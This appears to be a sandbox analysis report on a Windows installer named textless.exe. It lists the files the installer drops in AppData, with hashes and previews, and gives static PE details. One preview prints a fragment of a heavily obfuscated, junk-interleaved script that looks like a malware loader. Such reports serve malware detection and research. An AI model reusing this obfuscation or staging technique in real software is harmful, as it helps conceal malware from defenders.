                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..V.V<!......5..|K..S.}+U.9.)...8...n...r..b...:R..$pz.W...CD`.z...X.'...#.S...C/4...6.nq..L....SF.EEwx..T...>b}......Z`..z}.I.e-.*O+l.?w....D.v...j..Yr:f.%.....n...H.tYf9T.OZ...J.(..zc.PrEU.\....P...ST.%..O]...&f.cJ_...U.I..g./...G;W9&..Jv/n..G!......f..8'<.j.j.d.....*......".f5......X...q..$..V|...}*.FROr..(y<..MBEV@.!...4C.z...............c<.9'.M1.....OC..$

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Omkld\ballfield.ass

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):58928
                                                                                            Entropy (8bit):1.2626939660154362
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:pcAfk+AnbgQe+kPrlVrzlhdL6jx11ouGwM/8:59Nkv
                                                                                            MD5:6535DEC4BB3F4914D6A60901948B358B
                                                                                            SHA1:273D708F01C72B4BC4C6D36C4484524AE2A37F4B
                                                                                            SHA-256:68CD4323973D5277998D8B60B3C987577B010CA6F8D3ADE7A3E7D1231F8F0553
                                                                                            SHA-512:6C1749CCBFE7760EAC9F3A6BF3EE5C5A045A7CBEDC2B2EC237AD3CF85657769BEDBC41EDB56D44261404535405AEDD0AF2C3DC450675A9F2A1D29D78DD616647
                                                                                            Malicious:false
                                                                                            Preview:.3..............:.......U.....................................V....i.......................Y........................'............................8.............................................................+...........n..........H.................................................Y....@............................................................c..'.................."............................N.........................t......................S.....................5.....Q.....................................h....................N..................................[........................................................................F..........................&............................................................/.......................................................a....2....N........................................]........................K.............................X.................................2...........?...................................*..................B.......

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Omkld\boring.jpg

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 494x14, components 3
                                                                                            Category:dropped
                                                                                            Size (bytes):2176
                                                                                            Entropy (8bit):7.5992816081270815
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:D9YMOuERAOlmjUk4ndU2/AlwlfTz8M8VMIlVKBKu6uLFH+:RhREphu2tlKHlG36uZe
                                                                                            MD5:BDA63CF861821105FE9B4300C8E8F25B
                                                                                            SHA1:3AAB8B61C8BE65D854CE55441B26622966FE98F8
                                                                                            SHA-256:E79E64130443631CDD1DBBFB8C6B8427317781A3C50CA17D10A6C14027A82EEB
                                                                                            SHA-512:BABC1FBA905052303A9476ADDD92F8FED88E334199E307AD547304E17708B9824AE1FFC91DCC6C6DE10976D841ABA946E28B5D6D0BDD4DAB102AE73594975943
                                                                                            Malicious:false
                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...#.X............j........H>...S.......!........u.\.g...5....................7._..]r...?.1....]...C.(.]...........<G..iG.t...?.^b|q.f......._...........:......O.._....t.....$>'...j.......A.?.....o.v.W..1..(..!.....I...~..j..O.......!.5.9..#.............J.......R..a.....Z.D....?..?.J5}@t....C.4s......N....?..8h...O.Dkz...r?...8x.W.5......G<{.,

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Omkld\bouleuterion.jpg

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 789x302, components 3
                                                                                            Category:dropped
                                                                                            Size (bytes):30202
                                                                                            Entropy (8bit):7.96328907923243
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:fA6owDYF36Pe9nBJSuz3DWwp0I1lkTgU2DbYyp2F:fA6oiYB6PwBouzT8IITXI5p2F
                                                                                            MD5:E764FB01E297D91C48E29D363277EFC0
                                                                                            SHA1:60549A56341278224B647E7B831EBE1206FAE804
                                                                                            SHA-256:6026318F3F4BEBE143472FD97D8547AAE293EE7926F0BD5AC4D0FF984A597636
                                                                                            SHA-512:94B5E5CD9748826061BE70F4B46A3E6CA79F6AC4872E90317DEA10F832AA0A8475465077D586A20DD7A817F6E0FC45C153092909797DAE8DD76FAB64C1C81BC4
                                                                                            Malicious:false
                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...y.TS...I..0.S.J@..*.7.G.p...7.. 4.j0i.X.i.Z.RgT&..KM..5....(ZL.KS...O..!j...i*....@.$w..IL-Q.V....+=F..i5.G$.p&.ny......f..d.f.4...c.(....L.K.....Pj..&..5.4..%..-34..C....4S.Q.1F(......C...I...DDSMJG.0....i.!..h.2)1Rb....)@......Zn)...(....v..J.;5..7..)4.....jb.Z.$SK..P!.......\...uG..u...7R...Rf......34..q.8.i4f.4.R.RQIJ.QE.\|.QE..(..4.Qq.IK.1J.r.4S.F(.Q.S

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Omkld\folioformat.ini

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):238
                                                                                            Entropy (8bit):4.650033481879272
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:3MXfLWtAJWKdAZXEmvySvuiAWAVZ0evPWhyIGFhenMmJtc12oan:cXIAndApdLvuizAVeWPWhyIGfaCan
                                                                                            MD5:20E81A81FC8DBE56A8D7D364E928C500
                                                                                            SHA1:4B9B7F0C641ADAC095D1514CF577037C04F02AB4
                                                                                            SHA-256:A0C87FECB84E9F2724B64805BAD60D1A7D7669AEB591FB8A000FA3E4DB5027CD
                                                                                            SHA-512:F9BFFC80201DFCF3A71E3446460D1686648AF754E2C5A5F489ECC12D58393A128E052E38D42F22822E836E43402E36871FA8585D83CE7CD5510ACA8992715ABA
                                                                                            Malicious:false
                                                                                            Preview:Hospitalsindlggendes infiltreringens regosols brges redroot dragere gemmel......[SUPPLERET SUPERMARKED]........;lactescense optrvlingers ella uigendriveligt harnisks,standardrutiners tvetullerne propped equiaxial fliglben barokstils......

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Omkld\funktionrens.txt

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):448
                                                                                            Entropy (8bit):4.339266955839172
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:CEEl4NlCKAO6noRPEcJzxE03EX9IuvCKo05o8wfYJWOfJWWir/c7Fk8Sne0i:Ctl4CqB3d3EX9drtuFYJW3QTSev
                                                                                            MD5:86BEFA7A80190B17A5D263CB67CABF56
                                                                                            SHA1:BBF927E6B94BB210584FDEAF4072264717A75241
                                                                                            SHA-256:D5D85933FCF4D18AEA5B2F36BD0C087C279827F5A5C7E4486F7CBCDD6AA4E158
                                                                                            SHA-512:FC39E26DCE97D2B4CCA84B32CBE2AD823DF3C910A44CA68D4BCB0BCD9B2172CC95BE5808019BECCA9B337D160085C0A73DD0C5E701AB57C4F28B8417F740925C
                                                                                            Malicious:false
                                                                                            Preview:......;entraps bookit aabningstaler gels willedness biographises bverlamspelsene.Tracerteknikker lokalplanlgningernes pligtmenneskets bldgrere tilelike makuleret kapningernes..astragali overgangsbestemmelsers askesis udskylningen slaamaskinen.Indtaegt metavidenskab asuang shuckings..jaets kerve arizonite,superlaryngeally symptomise nonteminalen..;hjemmefdning bevikling handicrafters barenecked derfra witjar kurist,modetegner stmagter atonic....

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Omkld\linienummereringen.sne

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):137003
                                                                                            Entropy (8bit):1.2600579103434955
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:uKbwmcqCZm6iSGPcUXjGbjGUrM4g7Rl6YU360:zty80
                                                                                            MD5:CD7A4998B070AE1001296759049A525C
                                                                                            SHA1:C338E0DE9A9A533D5FFC6AE8494D84BDEA8A411C
                                                                                            SHA-256:BBCFADD87CF92C51FFE7BDEA5F2E025E16CAD3BCDEE331293EC5C925BD23956F
                                                                                            SHA-512:00756122FF5ACB5BF47181847BF32962F7B6076C04B64F326CE48F6B7C5FC93C15809AB8D3EFEB67BD6E52D77C7EBFDF5AB8FB742B0D3D7840AAD63AAB983C1C
                                                                                            Malicious:false
                                                                                            Preview:....@.......................................................................................%...............j.........................................................................0...............................................#.........%............................................................................................................<......................................................................................#..#........7........*...............................d................................................................................................M....I......I..............................|........................p.................-........................9.......0.........p.........<................,...........................'.........................................................................................................................E................................................................................

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Rouladen.het

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):72519
                                                                                            Entropy (8bit):1.2387524314484188
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:SdEY131pbEUmrewkV9ctzrG7VMIR+ephQF9gar:SR1FpYUOkbcBWV5UephQF3
                                                                                            MD5:7F0CD3FC131454E3BE7C008F0D57CC74
                                                                                            SHA1:F7372E8B267C4BE1CEF645C6EA6B458FD6A0F84F
                                                                                            SHA-256:D2215E2114436DB47D0AEE954F0565A8555489C91961458D8D4F70778F9B72EC
                                                                                            SHA-512:152ADBC7546240D65F202C88AE96B5FBDFF98E2D0DA071205DD3549FB8B882F4AE163A2E20DE9C49867F590940F611375E9E04673E11F375B74D6659E0AF2B96
                                                                                            Malicious:false
                                                                                            Preview:yy.y.yyyyyyy.yy.y*yyyyyy.yy.yyyyyyyyyyyyyyyoyyyyyyyy.yyyyyyyyy.yyyy.yyyy.yyyyyyyyy.yyyyyryyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyynyyyyyyyyyyyyyyyyyyyyyyyyyyyyyFyyyyyyyyyyyyyyyyyyyyyyyyyyyy.yyyyyyyyyy.yy$.yyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyyy.yy1yyyyyyyyyyyFyyyyyyyyyyyyyyyyyyyjyjyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyy#yyyyyyyyy.y.yyyyyyyyyyyyyyyyyyyyyyyy.yyy.yyyyyyyyyyyyyyyyyyyoyyyyyyyyyyyyyyyyyy.yyyyyyyy.yyyyyyyyyyyyyyyyyy.yyyy*yyyyyyyyylyyyyyyyyyyyyyyyyyyCyyyyyyyyy\yyyyyyyyyyyyyyyyyyy.yyyyyyyy.yyyyyyyy.yymyyyy.yy.yyyyyyy.yyyyyyyyyyyyyyyyyy^yyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyydyyQ.yyyyyyVyyyyyyy0yyyyyyy.yyyy3yyyyyyyyy.y.y.yyyyyy#yyyyyyyy`yyyyyyyyyyyy.yyyyyyyyyy[yYyyyyyy.yyyyyyyyyyyyyyyyyyyyy..yyyy...yy.yyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyy]yyyyyyyyyyyyyyyyy.yyyyyyyy^yyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyyyyyyyyyyyy..yyyyyyyyyyyyyyyyyyyyyyyyyyyyeAyyy.yy.yyyy.yyyyyyyyyyy#y.yyyyayyyyyyyyyyyyyyyyyyyyyyyyyyyyy..y.yyyyyytyyy.yyyyyyyyyyyyyyy.yg.yyyyyyyyyyyyyyyyyyyyyyyyyyyyy:y.y*yy

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Zeta.ini

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):287
                                                                                            Entropy (8bit):4.336041032067111
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:fm3IxZWR4yEGSD7VrOavIWEZbSEtL7lrQXQKfK6pPWFEfv:OYxYtEGSDhOavIb8CLpYL7phH
                                                                                            MD5:48B038CB1F14E0CA6216EB477C067408
                                                                                            SHA1:C98C0F9A1F16915BB059AA669550FAD3BA6524B7
                                                                                            SHA-256:FD1F8E9AC351D575369FDA7517CE61DD2043020AE1F7B9A8CBA005FB23D56758
                                                                                            SHA-512:2965FB40411840CA6E6CFD7B585EE78BED502216318959980E0CA299DFAAE6B50B5A7AD65DBDEC52141FC1C07D1FB7433BCAE94F73473238D78BEE81218D9E76
                                                                                            Malicious:false
                                                                                            Preview:..........ariadnetraades skulptureres laparotomize.Taposa mutinado runcinate kittlest slagtende finlandssvensker eftertnksomhed boldtrers pygobranchiate ramekin......;opstramninger disshroud typewrited kreaturerne.Socialbedragerierne tappestederne kanonfotografens moralism seams sudle..

                                                                                            C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (3239), with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):54689
                                                                                            Entropy (8bit):5.352681396723301
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:xKtMqBub7OlyQqx0NeGC9NdnYN8X0kkfbOD52srf8S92M:x/qBtlbqxmeGC9N+8XgzmMsT8K2M
                                                                                            MD5:0D15C99B57AED3D01C2DC077A82D8E5A
                                                                                            SHA1:ABA0BE4F62421CFBF555D62C3BC3C31A14C47913
                                                                                            SHA-256:9F54593C7E2EB02ACC0828279307D81D539AA26C8CE25D2DD4869304C914151F
                                                                                            SHA-512:FFD5D7E840570A2F8960B84B8B03967C5CDED9BC3B206B8C6CEDB992C1DC1EBB63D73A859305A822106C5F389D4D199D968328843F3319961A50E2043E6A4C47
                                                                                            Malicious:false
                                                                                            Preview:$stodderprinss=$chemosynthesis;........$Beboss = @'. Kopp.Deple$Talj FSkattlTogsuu A punI,dtakSpeelyAtheih FikhoPronaoSlammdBarse=dsl s$YelpeS atact Myo,rSparraAm,asnPost datt nf B,lcoDiskegsche eGyntedGroveeSpittnTj nes.xcus; lan.ParadfRibbouHee fnSaligcFjerktGatepi MadgoEgnsunra do B adlRS opmo Dre,tStoletWelcoeHawfihSldera SporlBrus eAmbusrAktio Aliba(Arbe,$MisgoTO ciluUdbydf ta ms RedntBrokbe ,estnLilleeindrinDunhas Afid,Prepo$RaadnKCountoIsophrBesmir S naeGl,besUnderpMottooCrotanArc edMuh masnap.nPardncRhetteOphiokProcooindfarSancttMelaseSamletFodin)Naadi kvi {Monem.Knort.Erobr$ DrisVFrplaaClivbrSectilB rrea C lo Made (fr kvJS.ntaaHis.otErgoneInt ro SmalrHautehEpic iFlammzCataciHjtidnMoxie Kutt' ,oleU tatidOm.typsprucaContrnS yph$ConjuOMac osInvest SeedeLdepooTo beTZon,i AadseSOrthok eskioQuerel SpriuPostf TobakSAppormSimplkNorskfCoh ifStap TVarmeuAntitb.eargeBlommnSt.arsHebraTFolkerudty l Brikl kom BuskptBesigSEntreyDiscid BoyddStal.i nglne MuldG PererAper,aPedat MusetaL.str

                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.675891095317541
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:textless.exe
                                                                                            File size:621'676 bytes
                                                                                            MD5:9e8270179f04d867463a09af7ee36e32
                                                                                            SHA1:e32b5ff6d109b529112f35c8f639fbb1bb5f4986
                                                                                            SHA256:cc357e0c0d1b4b0c9cdaaa2f7fd530c7fcee6c62136462c1533d50971f97d976
                                                                                            SHA512:8d6bc637fe29007211bd9cccc84b64c5dbfcc9083cb9097e2427e32e2de4d6d957928184717ee2b4feba9a75631d87747639da74682c65e82922d715c1f627b7
                                                                                            SSDEEP:12288:JowisraETWNMHwQsNNG14vkM46P/wyeqwvcinEFAKSN+qq/9lX97:Jow/ra8WKQlM14h46P/wAYSLqq/7X97
                                                                                            TLSH:70D401FD2BC0AD1BC0E09E7164A767EB73659E1F6349574FE332B75C2A721A3180508A
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

                                                                                            File Icon

                                                                                            Icon Hash:1761ccccce9a6b0f

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x40322b
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:4f67aeda01a0484282e8c59006b0b352

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            sub esp, 00000184h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            xor ebx, ebx
                                                                                            push 00008001h
                                                                                            mov dword ptr [esp+18h], ebx
                                                                                            mov dword ptr [esp+10h], 00409130h
                                                                                            mov dword ptr [esp+20h], ebx
                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                            call dword ptr [00407120h]
                                                                                            call dword ptr [004070ACh]
                                                                                            cmp ax, 00000006h
                                                                                            je 00007F1FD9107523h
                                                                                            push ebx
                                                                                            call 00007F1FD910A4A9h
                                                                                            cmp eax, ebx
                                                                                            je 00007F1FD9107519h
                                                                                            push 00000C00h
                                                                                            call eax
                                                                                            mov esi, 00407298h
                                                                                            push esi
                                                                                            call 00007F1FD910A425h
                                                                                            push esi
                                                                                            call dword ptr [004070A8h]
                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                            cmp byte ptr [esi], bl
                                                                                            jne 00007F1FD91074FDh
                                                                                            push ebp
                                                                                            push 00000009h
                                                                                            call 00007F1FD910A47Ch
                                                                                            push 00000007h
                                                                                            call 00007F1FD910A475h
                                                                                            mov dword ptr [00423724h], eax
                                                                                            call dword ptr [00407044h]
                                                                                            push ebx
                                                                                            call dword ptr [00407288h]
                                                                                            mov dword ptr [004237D8h], eax
                                                                                            push ebx
                                                                                            lea eax, dword ptr [esp+38h]
                                                                                            push 00000160h
                                                                                            push eax
                                                                                            push ebx
                                                                                            push 0041ECF0h
                                                                                            call dword ptr [00407174h]
                                                                                            push 004091ECh
                                                                                            push 00422F20h
                                                                                            call 00007F1FD910A09Fh
                                                                                            call dword ptr [004070A4h]
                                                                                            mov ebp, 00429000h
                                                                                            push eax
                                                                                            push ebp
                                                                                            call 00007F1FD910A08Dh
                                                                                            push ebx
                                                                                            call dword ptr [00407154h]

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x330000x28560.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x5dc50x5e00566b191b40fde4369ae73a05b57df1d2False0.6685089760638298data6.47110609300208IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x70000x12460x14006389f916226544852e494114faf192adFalse0.4271484375data5.0003960999706765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x90000x1a8180x40072dcd89e8824ae186467be61797ed81eFalse0.6474609375data5.220595003364983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x240000xf0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x330000x285600x28600740291f8cbb068f1d5cf95ecc518480eFalse0.5544456269349846data6.273994471716261IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x333580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.5137229386016798
                                                                                            RT_ICON0x43b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.560752575152407
                                                                                            RT_ICON0x4d0280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.5963031423290204
                                                                                            RT_ICON0x524b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.608171941426547
                                                                                            RT_ICON0x566d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.6493775933609959
                                                                                            RT_ICON0x58c800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.7178705440900562
                                                                                            RT_ICON0x59d280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.7561475409836066
                                                                                            RT_ICON0x5a6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.7872340425531915
                                                                                            RT_DIALOG0x5ab180x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x5ac180x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x5ad380xc4dataEnglishUnited States0.5918367346938775
                                                                                            RT_DIALOG0x5ae000x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x5ae600x76dataEnglishUnited States0.7542372881355932
                                                                                            RT_VERSION0x5aed80x348dataEnglishUnited States0.4845238095238095
                                                                                            RT_MANIFEST0x5b2200x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllCopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                            USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                            ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                            Version Infos

                                                                                            DescriptionData
                                                                                            Commentsupthunder skkestols amoebaea
                                                                                            CompanyNamesexiness phytophenology ergoterapeuters
                                                                                            FileDescriptionpaleostriatum provokingness subdeans
                                                                                            FileVersion3.5.0.0
